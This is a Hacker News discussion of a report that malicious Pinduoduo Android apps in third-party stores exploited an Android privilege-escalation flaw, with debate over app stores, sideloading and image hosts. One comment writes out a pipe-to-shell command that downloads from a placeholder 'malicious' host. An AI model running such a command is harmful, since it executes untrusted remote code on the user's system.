[HN Gopher] Android app from China executed 0-day exploit on mil...
___________________________________________________________________
Android app from China executed 0-day exploit on millions of
devices
Author : LinuxBender
Score : 189 points
Date : 2023-03-28 12:54 UTC (10 hours ago)
(HTM) web link (arstechnica.com)
(TXT) w3m dump (arstechnica.com)
| hospitalJail wrote:
| Maybe because I'm from a different era, but installing anything
| on a device from a website is an extremely risky game. There is a
| reason we moved toward using a web browser to do functionality
| that was typically done on desktop.
|
| I'm not one to worship Google's walled garden(which is just
| marketing jargon), but at least that has some layer of
| verification and malware detection.
|
| I still dream of a web app based future. Then we only need to
| security proof 1 app.
| hulitu wrote:
| > Maybe because I'm from a different era, but installing
| anything on a device from a website is an extremely risky game
|
| You are (just like me) from a different era. /s
|
| I was trying to compile rust (for mozilla) and i was shocked to
| see that it connects to the internet during the build process
| to download crates (i presume these are some kind of
| libraries). Then you have js with npm and the menu is served.
|
| Even if the web browser has a container, this can be
| compromised during the build process.
| kelnos wrote:
| Which era is that, though? There was a decently-long stretch of
| time between shrink-wrap software being common (I think my last
| boxed software purchase was probably in the late 90s), and the
| advent of the App Store (2008). During that time, downloading
| things from a website was the primary method of installing
| software.
|
| Also, it's not like people were installing this app from a
| random sketchy website; it appears to have been available on
| third-party Android app stores, which are the only option in
| China, since the Google Play Store isn't allowed there.
|
| > _I still dream of a web app based future._
|
| Right there with you, but sadly, I don't think it's a realistic
| hope.
| SoftTalker wrote:
| > installing anything on a device from a website is an
| extremely risky game
|
| curl https://malicious.example.com/useful_thing | bash
|
| and its variants?
| jeroenhd wrote:
| With the capabilities web apps have gathered over the years, I
| don't feel very comfortable with using random web apps either.
| As an added downside, random blog posts and ad iframes can now
| try to access the same APIs real web apps can. The more we move
| to a web app based reality, the more we're going to see
| exploitation of browsers and their many features.
|
| We'll never get our one security proof app because security
| proof apps can't do things like rendering and file manipulation
| at acceptable speeds.
|
| Downloading apps from websites is almost always a red flag in
| my opinion. If an app can't be in Google's app store for
| whatever reason, it surely can appear in another.
|
| The only APKs I've downloaded come from Github/Gitlab because
| open source apps aren't always on F-Droid, and APKmirror
| because my phone is rooted _, and I consider myself to be a
| power user. I 'm really surprised an app like this is popular
| enough to get downloaded installs at all, though perhaps the
| Chinese app ecosystem is different enough that I simply can't
| understand.
|
| I'd hate to have to resort to web apps for absolutely
| everything on my phone. Messengers and such need optimisations
| for battery usage and resources and browsers don't offer any of
| that. The overhead of web applications is also quite
| significant. Don't get me wrong, I use several web apps for
| small things like weather sites and a simole game here or
| there, but there has to be room for both or the mobile
| experience will get worse for everyone.
|
| _ therefore I can't download Netflix from Google Play for some
| absolutely idiotic reason even though the stupid app works
| perfectly afterwards. They just hate me for wanting to sync my
| clipboard automatically, I'm guessing.
| blendergeek wrote:
| > I'm really surprised an app like this is popular enough to
| get downloaded installs at all, though perhaps the Chinese
| app ecosystem is different enough that I simply can't
| understand.
|
| From the article:
|
| > The malicious versions of the Pinduoduo app were available
| in third-party markets, which users in China and elsewhere
| rely on because the official Google Play market is off-limits
| or not easy to access.
| kelnos wrote:
| > _The more we move to a web app based reality, the more we
| 're going to see exploitation of browsers and their many
| features._
|
| True, but as the GP pointed out, we only have to secure one
| app, and fixing a security issue in it saves you from anyone
| exploiting that flaw in any other app.
|
| Sure, you can make the same argument of an OS-level flaw, but
| that leaves people with older devices out in the cold, as
| they often don't receive OS updates anymore. The browser is
| just an app, and as long as it supports the OS running on the
| older devices, you get those updates years after your device
| vendor stopped supporting you.
|
| We're never going to solve all security issues (at least not
| until "perfect" AI starts writing our software), but I'd much
| rather run apps in a a browser than on the device directly,
| even with Android/iOS's app sandboxing tech.
| rhn_mk1 wrote:
| That's like saying "in a native-based future we only need to
| security proof the OS". There's no free lunch, you always need
| to check both the sandbox layer and the application.
| jeswin wrote:
| Browsers have a truly remarkable track record when it comes
| to security. We have been able to run untrusted code for
| nearly two decades now without a large scale breach.
| mavhc wrote:
| Even since they banned plugins
| hulitu wrote:
| > We have been able to run untrusted code for nearly two
| decades now without a large scale breach
|
| None that we know of. Keep in mind that not so long ago the
| browser did not have access to filesystem except to save
| files. Now the browsers have access to filesystem, camera,
| microfone, they can act as servers, they have access to USB
| devices.
|
| I mean WTF. What kind of security is that ?
| rhn_mk1 wrote:
| That's because browsers don't do all that much compared to
| an operating system (although they are catching up). On the
| other side, since Windows XP, security of the OS's has been
| steadily improving as well. What breaches do you mean
| anyway?
|
| Once you push broad access to user data and hardware to
| browsers, you'll get ransomware there, too. Meanwhile,
| native sandboxing keeps advancing.
|
| So no, web will not remain the safer option forever.
| [deleted]
| 2OEH8eoCRo0 wrote:
| https://www.bleepingcomputer.com/news/security/android-malwa...
|
| > A new set of Android malware, phishing, and adware apps have
| infiltrated the Google Play store, tricking over two million
| people into installing them.
|
| https://lifehacker.com/great-now-the-apple-app-store-has-mal...
|
| > Security researchers found malware in several popular App
| Store apps.
| kccqzy wrote:
| GP said it has some layer of protection of malware, not that
| it has 100% protection. And yes in my own experience Google
| Play Protect has successfully caught malware. The goal is to
| provide some better-than-zero protection.
| 2OEH8eoCRo0 wrote:
| But is it better than going to the developer website that
| uses SSL and downloading directly? A consolidated app store
| is a single point of failure after all. Hard to say it's
| actually better. There's also no need to bundle the malware
| scanner with the app store since all it does is scan your
| device. You can have a malware scanner without an app
| store.
| kccqzy wrote:
| Huh you are right: I just found that Google Play Protect
| does support scanning apps not downloaded from the Play
| Store.
| tomComb wrote:
| I don't think he was suggesting that walled garden is perfect
| in this regard, but that it is much safer than bypassing it,
| so instances such as you list don't really refute his point
| (assuming that was your intention).
| sct202 wrote:
| Temu (Pinduoduo's American app) appears to be unaffected and is
| still #1 on the app store and even has an "Editors Choice" badge,
| but with their parent company risking reputational harm on their
| main app I would be cautious.
| pavon wrote:
| Google should block all of their app signing keys, and only
| allow new ones when PDD can explain how malicious software was
| signed with the previous ones.
| superb-owl wrote:
| As much as I hate the monopolistic nature of the app stores, this
| is why they're a good thing.
| akira2501 wrote:
| I have a computer in my pocket that I don't fully control, own,
| or operate.
|
| The actual monopoly they enjoy or the remote control of my
| devices aren't the real solutions to this problem.
| asplake wrote:
| Or: Why app stores are a thing
| cubefox wrote:
| App stores extract absurd amount of money (30%) from the app
| ecosystem. This is not worth the slight increase in security.
| scottyah wrote:
| Maybe not for developers, but for users it is
| cubefox wrote:
| Users on average also have to pay part of the app store fee
| since some form of the cost will be handed down, e.g. more
| expensive app / app lower quality.
| kernal wrote:
| These fake apps were signed with the signing key of the official
| PinDuoDuo app. Until PinDuoDuo can explain how this signing key
| was "stolen" they are to blame for creating this malware.
| RobotToaster wrote:
| It's interesting how the headline writer chose to include "from
| China". If the developer had been French of American, would they
| have included "from France", or "From America"?
| tyrfing wrote:
| It's a company with 750M MAU, so very large but still not
| something most US readers would be aware of. If it was a French
| or US developer, they would have just used the name of it.
| PakG1 wrote:
| From the article: _The malicious versions of the Pinduoduo app
| were available in third-party markets, which users in China and
| elsewhere rely on because the official Google Play market is
| off-limits or not easy to access. No malicious versions were
| found in Play or Apple's App Store. Last Monday, TechCrunch
| reported that Pinduoduo was pulled from Play after Google
| discovered a malicious version of the app available elsewhere.
| TechCrunch reported the malicious apps available in third-party
| markets exploited several zero-days, vulnerabilities that are
| known or exploited before a vendor has a patch available._
|
| As far as I know, China is the only country that has 3rd-party
| Android app markets of that size because Google Play is
| literally not allowed there. So I don't think this would be a
| significant story anywhere else in the world.
| [deleted]
| fulafel wrote:
| The EvilParcel saga seems quite tragic. You would think after the
| first few repeats they would have taken some stronger measures
| than patch up the new API misuse case of the day.
| rfoo wrote:
| Previous discussion:
| https://news.ycombinator.com/item?id=35269347
| eekfuh wrote:
| Not to be pedantic but it's not a 0-day when the patch for the
| vuln was released before exploit was executed.
| jgalt212 wrote:
| You're right I think it was a 14-day.
|
| > Google patched in updates that became available to end users
| two weeks ago.
| jcul wrote:
| Though it says it was exploited before Google's disclosure
| (not sure if disclosure is referring to the timing of the
| patch, but the linked Google post is from 6th March).
|
| > This privilege-escalation flaw, which was exploited prior
| to Google's disclosure
| pavon wrote:
| From the article:
|
| > Lookout's forensic analysis of two Pinduoduo APK app samples
| released prior to March 5 ... has determined that both contain
| malicious code that exploits CVE-2023-20963, the Android
| privilege-escalation vulnerability that wouldn't become public
| until March 6 and wouldn't be patched in user devices for up to
| two weeks later.
| yorwba wrote:
| Previous submission on the same topic:
| https://news.ycombinator.com/item?id=35269347 (krebsonsecurity,
| 38 comments)
| [deleted]
| prox wrote:
| Anyone from China or informed enough can chip in how secure the
| marketplace is? How often does this happen? I had my own problems
| with a Chinese developed app I needed to add some content for a
| client.
| HeavenFox wrote:
| Chinese apps, even those from big established players, are often
| indistinguishable from malware. Off the top of my head, I can
| think of:
|
| - Hiding their app icon from launcher, but add a widget that
| looks the same. So if the user tries to uninstall the app, they
| just deleted the widget and the app remains.
|
| - One app would install other apps from the same company in the
| background without user consent.
|
| - Multiple apps will wake each other so they always stay in the
| background and become impossible to kill
|
| - Requesting every permission under the sun and transmit as much
| info to the mothership as possible
|
| - Secretly turning on the camera and film their users
|
| However, these only happen on Android version. iOS version never
| have these issues.
|
| So even though I am not a fan of the Apple monopoly, I am really
| really afraid that by allowing third party app stores and
| sideloading, the western apps will race to the bottom and become
| just like this.
|
| ("But you can always download from the official App Store!" you
| may say. But what if, say, Tik Tok announces they will from now
| on leave the App Store and available only via direct download?)
| alex7734 wrote:
| > ("But you can always download from the official App Store!"
| you may say. But what if, say, Tik Tok announces they will from
| now on leave the App Store and available only via direct
| download?)
|
| Personal freedom always has personal responsibility attached.
| If you direct download it and it's malicious, well, that's your
| own problem. Probably should've thought about it better.
|
| If you don't want to think about security, all you have to do
| is only install apps that are in the app store. Why should
| everyone else be restricted from doing whatever they want with
| their phones?
| otterley wrote:
| > iOS version never have these issues
|
| The security argument for the App Store has never been
| stronger.
|
| > "But you can always download from the official App Store!"
| you may say. But what if, say, Tik Tok announces they will from
| now on leave the App Store and available only via direct
| download?
|
| ... and nothing of value was lost.
| andersa wrote:
| This makes no sense. It's an argument for proper security
| controls and permissions setup on the OS level, not an app
| store.
| manuelabeledo wrote:
| > The security argument for the App Store has never been
| stronger.
|
| Is this _really_ what we want?
|
| Because if so, what is the difference between a clamped down
| App Store with arbitrary rules, and what China does with
| their Great Firewall?
| pknomad wrote:
| Yes.
|
| It's going to be an unpopular opinion but there's an awful
| lot of applications that are out there that are just
| hilariously outdated, terribly made, or is some form of
| malware. I mostly use mainstream apps (Google Maps,
| Bitwarden, Safari, Slack, Discord, Spotify, Canary, etc)
| and the times I do look for new apps I enjoy having the
| convenience of not having sift through awful apps that used
| to plague android market (and to a certain extent google
| playstore).
|
| App Store is not perfect by any means but I think it's
| superior to alternatives that are out there for users like
| me.
| simmerup wrote:
| Every industry is regulated, it's coming for software and
| it will help the common user from being exploited.
|
| Do you see the legislation for broadcasting and say, 'What
| makes that different from how you have no free speech in
| China?!'
|
| We've already had voluntary step backs in the idea of
| online liberalism with Twitter having to be heavily
| pressured to take down ISIS propaganda. Codifying those
| rules for everyone is inevitable.
| dec0dedab0de wrote:
| _what is the difference between a clamped down App Store
| with arbitrary rules, and what China does with their Great
| Firewall?_
|
| With a locked down App store in America you have an option
| of using another device, or just using a computer, without
| any repercussion. With the Chinese great firewall working
| around it can lead to legal troubles, to put it lightly.
| raincole wrote:
| ... you know you can buy an Android phone, if that's what
| you want, right?
|
| You can't get an ISP without Great Firewall in China. If
| you try to found such an ISP you'll be in jail.
| kelnos wrote:
| > _The security argument for the App Store has never been
| stronger._
|
| Perhaps, for many users this is true. But I don't need or
| want a nanny-company telling me what I can and can't install
| on my devices.
|
| (And yes, I do sideload apps -- including one I've written
| myself -- on my Android phone. So this isn't a theoretical
| "don't take my freedom" type concern.)
|
| >> _But what if, say, Tik Tok announces they will from now on
| leave the App Store and available only via direct download?_
|
| > _... and nothing of value was lost._
|
| Couldn't agree more with that sentiment. The problem is,
| though, that many people will still download it from TikTok's
| own website or app store. Security is a collective problem:
| even if I manage to avoid malware, a friend or colleague --
| who may have email or chat or whatever history with me --
| could get hacked, and that would still leak some of _my_
| data.
| gretch wrote:
| > Perhaps, for many users this is true. But I don't need or
| want a nanny-company telling me what I can and can't
| install on my devices.
|
| 100% agree. Simply don't buy an Apple phone.
| jxramos wrote:
| this has been a recent consideration of mine I haven't
| fully explored or thought how to deal with yet. I now look
| at new friends with suspicion, especially those who are not
| tech savvy. I just gave out an email to a friend recently
| and he forwarded me an email list without BCC revealing all
| the recipients. I thought to myself, "oh boy somewhere down
| the road I'm going to be getting hacked email messages from
| one of these individuals."
| smm11 wrote:
| Tiktok, tick, tick, tick.
| screamingninja wrote:
| From en.pinduoduo.com:
|
| > Pinduoduo's core value is "Ben Fen " (Ben Fen). It is difficult
| to express it perfectly in English, but it essentially means to
| adhere firmly to one's own duties and principles. There are
| several layers of meaning here:
|
| > Be honest and trustworthy;
|
| > Discharge our own duties and responsibilities regardless of
| others' conduct;
|
| > Never take advantage of others even when we are in a position
| to do so;
|
| > Self-reflect and take responsibilities when problems arise
| instead of blaming others.
|
| I guess the company's app developers never got the memo.
| jonatron wrote:
| I was wondering why PinDuoDuo were hiring for "Android Reverse
| Engineer". Screenshot of translated job page:
| https://github.com/jonatron/randomstuff/blob/main/Screenshot...
|
| Edit: Replaced imgur link
| chatmasta wrote:
| To be fair, there are plenty of legitimate reasons to hire a
| reverse engineer. Maybe you're building a red team to your
| AppSec blue team, or you want to analyze the apps of your
| competitors, or any apps at the top of the App Store (you'd be
| shocked at the dark patterns you can uncover by looking at
| newly trending apps).
| tester457 wrote:
| Dark patterns like what?
| cubefox wrote:
| (Off topic, but does someone know a good alternative to imgur?
| The website currently autoplays unrelated videos, freezes my
| mobile browser for several seconds, and appears to hijack the
| back button. It feels like malware.)
| doodlesdev wrote:
| If you are the one linking you can just grab the URL for the
| image file directly. If opening the website to do that is
| your problem... good luck I guess Lol
| jonatron wrote:
| I linked the image file url, but checking on my phone, it
| redirects to the bloated page instead of the image. Loaded
| just the image on my desktop though.
| thatguy0900 wrote:
| On mobile they also default to serving resolutions that
| are completely unusable a lot of the time. I find myself
| going to desktop mode for anything with text on it.
| cubefox wrote:
| Ah yes, that's another major problem. I couldn't see
| anything on the screenshot. So far I always assumed the
| poster uploaded the wrong resolutionm.
| miyuru wrote:
| You can link the image without the "i" subdomain and it
| will redirect to the direct image.
|
| eg: https://imgur.com/4clqUdj.jpg (picture of a cat)
|
| since the traffic appear to come from the main domain to
| them, it does to redirect back to the html page.
| CaptainNegative wrote:
| This is what showed up for me https://cdn.discordapp.com/
| attachments/519791942654230528/10... .
| cubefox wrote:
| Yeah, they redirect to that website which has all these
| issues. The back button hijacking (it doesn't work on
| that site in Chrome) is the most annoying one.
| cubefox wrote:
| I just remembered a good image upload service:
| https://abload.de/
|
| It is online since 2006, does no obviously evil browser
| stuff, and the guy hosting it seems cool.
| robgibbons wrote:
| I just had to close the tab myself.
| nouryqt wrote:
| I like https://catbox.moe. Works with ShareX and has a few
| tools like browser extension for right click upload context.
| https://catbox.moe/tools.php
| causality0 wrote:
| With the caveat that you should fully expect catbox.moe to
| be added to your organization's blacklist if it hasn't been
| already. It's kind of the premier service for sharing
| content that falls into the "legally grey but no big
| service will ever let you keep it on their site" content
| like mass shooting videos, etc. Just don't get used to
| relying on it at work is all I'm saying.
| chatmasta wrote:
| As a general rule of thumb, if I've seen a URL shared on
| 4chan, I assume it's either a honeypot or a service people
| will judge me for associating with. I also avoid clicking
| such a URL because it's the kind of place I'd expect to
| find a zero day WebKit exploit.
| password4321 wrote:
| Drop your image into a comment on a GitHub issue, switch to
| preview and copy the link.
|
| Sort of like using Twitter as a URL shortener.
|
| Do not recommend abusing this.
| Workaccount2 wrote:
| It's too much of a hassle with NoScript too. At least 12
| domains trying to run js and allowing just imgur still
| doesn't load the image. Ridiculous that you even need js to
| view an image anyway.
| nouryqt wrote:
| On a laptop/PC you could give the rimgo[0] frontend a try
| for simple viewing, no uploading or interacting. It's by no
| means perfect but works really well in addition with the
| LibRedirect[1] browser extension.
|
| Rimgo is basically a frontend for imgur that you can
| selfhost (or use a public instance). The LibRedirect
| browser extension automatically replaces the imgur.com URL
| with the specified rimgo instance.
|
| So for example https://imgur.com/gallery/eMKxD6t turns into
| https://rimgo.pussthecat.org/gallery/eMKxD6t.
|
| [0] https://codeberg.org/elttil/rimgo
|
| [1] https://github.com/libredirect/libredirect
| Workaccount2 wrote:
| This is great, thanks!
___________________________________________________________________
(page generated 2023-03-28 23:01 UTC)